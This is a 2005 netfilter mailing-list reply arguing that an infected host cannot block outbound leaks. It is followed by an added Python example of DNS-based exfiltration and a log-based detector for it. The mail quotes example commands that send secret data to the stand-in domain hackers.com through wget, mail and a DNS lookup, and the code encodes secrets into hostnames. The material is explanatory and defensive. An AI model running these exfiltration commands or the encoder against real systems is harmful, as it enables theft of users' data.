Linux Netfilter discussions
From: Frank Gruellich <frank@der-frank.org>
To: netfilter@lists.netfilter.org
Cc: Nick Drage <nickd@metastasis.org.uk>
Subject: Re: Nice ZoneAlarm that might be useful for Iptables
Date: Mon, 20 Jun 2005 07:28:33 +0200
Message-ID: <20050620052833.GP28123@der-frank.org>
In-Reply-To: <20050619214142.GN3217@metastasis.org.uk>

* Nick Drage <nickd@metastasis.org.uk> 19. Jun 05:
> On Tue, May 31, 2005 at 06:33:10AM +0200, Frank Gruellich wrote:
> > AFAIK for ZoneAlarm it means that a program starts a server: it listens
> > on a port.  For Unix it needs root privileges to listen on ports below
> > 1024 (dunno about Windows).
> AFAICT any program or user can open a socket on any port if it's not
> already in use.

You're talking about Windows, aren't you?

> > While OUTPUT has nothing to do with servers, it is simply impossible.
> > You can't protect an infected host.
> Of course you can.
> 
> If the malware doesn't have root, [snip].

The important thing I implied.  I wouldn't call it infection if it
doesn't run as root.  Then it's just ... broken, messy.

> > How do you intend to catch
> >  $ wget 'http://www.hackers.com/script.php?info=this%20is%20my%20very%20secret%20information'
> Use a proxy?

We were talking about local actions, weren't we?  A local proxy?  Much
effort, isn't it?  You have to use a transparent one, you know?  Who
decides, that script.php at hackers.com is going to be filtered?

> >  $ echo "this is the very secret information" |mail -s "$USER@`hostname -f`" jr@hackers.com
> A mail server or Network IDS set to pick up on the terms used in such
> secret information.

A local IDS?  Wow!  This doesn't sound like a single host system.

> >  $ ping -c1 www.this.is.my.very.secret.information.hackers.com
> Stop ICMP ping outbound?  Why would that be needed by normal users?

The penetration is not the ICMP but the DNS resolution.  hackers.com is a
bad guy's domain running some "special" kind of DNS server.  I've seen
shells running this way.

> You can't completely block malware from accessing the Internet, but you
> can make it really, really difficult...

No, it's IMHO not that difficult.

Kind regards, Frank.
-- 
Sigmentation fault
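
The point Frank makes about the ping example is that the payload leaves the host in the DNS query name, so an outbound ICMP rule never sees it. The following is an added example, not code from the thread or from any of its participants: it packs a secret into hostnames under an attacker-controlled zone the way a DNS tunnel does (the zone name hackers.com is the one used in the mail), and then runs a simple detector over resolver query-log lines. The BIND-style log format, the client addresses, the thresholds and the log contents are all constructed assumptions for this example.

```python
# Added example (not from the original thread): the data in the "ping"
# example travels in the DNS lookup, not in ICMP.  Part 1 packs a secret into
# hostnames under an attacker-controlled zone as a DNS tunnel does; part 2 is
# a detector over resolver query-log lines.  The zone "hackers.com" is the
# one named in the mail; the BIND-style log format, thresholds and client
# addresses are assumptions constructed for this example.
import base64
import math
import re
from collections import defaultdict

MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # longest name in presentation form


def encode_exfil(secret: bytes, zone: str) -> list:
    """Split `secret` over hostnames of the form "s<seq>.<data labels>.<zone>".

    Base32 is used because DNS names are case-insensitive; base64 would not
    survive a resolver that lowercases.  Each name carries a sequence label
    so the receiver can reassemble chunks that arrive out of order.
    """
    payload = base64.b32encode(secret).decode().rstrip("=").lower()
    # Per-name data budget: up to three full labels, bounded by the 253-octet
    # limit after reserving room for the zone, an "sNN" label and the dots.
    overhead = len(zone) + 1 + 4 + 1 + 2
    chunk = min(3 * MAX_LABEL, MAX_NAME - overhead)
    names = []
    for seq, start in enumerate(range(0, len(payload), chunk)):
        piece = payload[start:start + chunk]
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        names.append(".".join([f"s{seq}", *labels, zone]))
    return names


def decode_exfil(names: list, zone: str) -> bytes:
    """What the attacker's "special" DNS server does with the QNAMEs it sees."""
    suffix = "." + zone
    chunks = {}
    for name in names:
        labels = name[:-len(suffix)].split(".")
        chunks[int(labels[0][1:])] = "".join(labels[1:])
    payload = "".join(chunks[k] for k in sorted(chunks)).upper()
    payload += "=" * (-len(payload) % 8)        # restore base32 padding
    return base64.b32decode(payload)


def shannon_entropy(s: str) -> float:
    """Bits per character: base32 payload approaches 5, English text is lower."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


# Assumed BIND-style query log line (constructed format):
# "20-Jun-2005 05:28:33.001 client 192.0.2.10#52341: query: host.example.com IN A +"
LOG_RE = re.compile(
    r"^\S+ \S+ client (?P<src>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")


def detect_dns_exfil(log_lines, min_names=3, byte_threshold=200, entropy_threshold=4.0):
    """Group queries by (client, zone); flag a zone that receives many distinct
    subdomains carrying a lot of data, or high-entropy data, from one client.

    The zone is approximated as the last two labels (no public-suffix list),
    which is fine for an example but mis-groups co.uk-style names.
    """
    buckets = defaultdict(lambda: {"names": set(), "sub_chars": 0, "ent": []})
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        labels = m["qname"].rstrip(".").lower().split(".")
        if len(labels) < 3:           # apex name: no subdomain to carry data
            continue
        qname = ".".join(labels)
        zone, sub = ".".join(labels[-2:]), "".join(labels[:-2])
        b = buckets[(m["src"], zone)]
        if qname in b["names"]:       # repeated lookups of one name carry nothing new
            continue
        b["names"].add(qname)
        b["sub_chars"] += len(sub)
        b["ent"].append(shannon_entropy(sub))
    alerts = []
    for (src, zone), b in buckets.items():
        if len(b["names"]) < min_names:
            continue
        avg_ent = sum(b["ent"]) / len(b["ent"])
        if b["sub_chars"] >= byte_threshold or avg_ent >= entropy_threshold:
            alerts.append({"src": src, "zone": zone, "names": len(b["names"]),
                           "sub_chars": b["sub_chars"], "avg_entropy": round(avg_ent, 2)})
    return alerts


SECRET = b"this is the very secret information " * 6   # constructed, 216 bytes
ATTACKER, BENIGN = "192.0.2.10", "192.0.2.20"           # assumed client addresses


def build_log() -> list:
    """Constructed resolver log: one exfiltrating client, one ordinary one."""
    def q(src, name):
        return f"20-Jun-2005 05:28:33.001 client {src}#52341: query: {name} IN A +"
    lines = [q(ATTACKER, "www.this.is.my.very.secret.information.hackers.com")]
    lines += [q(ATTACKER, n) for n in encode_exfil(SECRET, "hackers.com")]
    lines += [q(BENIGN, "www.example.com"), q(BENIGN, "mail.example.com"),
              q(BENIGN, "lists.netfilter.org"),
              "20-Jun-2005 05:28:34.000 resolver priming query complete"]
    return lines


if __name__ == "__main__":
    for alert in detect_dns_exfil(build_log()):
        print(alert)
```

Run stand-alone it prints one alert for the attacking client and hackers.com, and nothing for the ordinary client. The detector is deliberately volume-based (distinct subdomain characters per client and zone) rather than entropy-only, because the readable `www.this.is.my.very.secret.information` name from the mail has the entropy of ordinary English and would slip past an entropy threshold alone; blocking ICMP, as proposed in the thread, does not remove the channel at all, since the lookup happens before the first echo request is sent.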



Thread overview: 15+ messages
2005-05-31  3:53 Nice ZoneAlarm that might be useful for Iptables Larry Alkoff
2005-05-31  4:33 ` Frank Gruellich
2005-05-31 18:18   ` R. DuFresne
2005-06-01  2:12     ` Feizhou
2005-06-01  2:16       ` Jason Opperisano
2005-06-01  2:37         ` Feizhou
2005-06-19 21:41   ` Nick Drage
2005-06-19 21:49     ` Jan Engelhardt
2005-06-20  5:28     ` Frank Gruellich [this message]
2005-06-20  6:47       ` David Busby
2005-05-31  5:07 ` Taylor, Grant
2005-05-31  6:42   ` Feizhou
2005-05-31  6:44     ` Taylor, Grant
2005-05-31  6:33 ` Eric Leblond
2005-06-19 21:35   ` Nick Drage
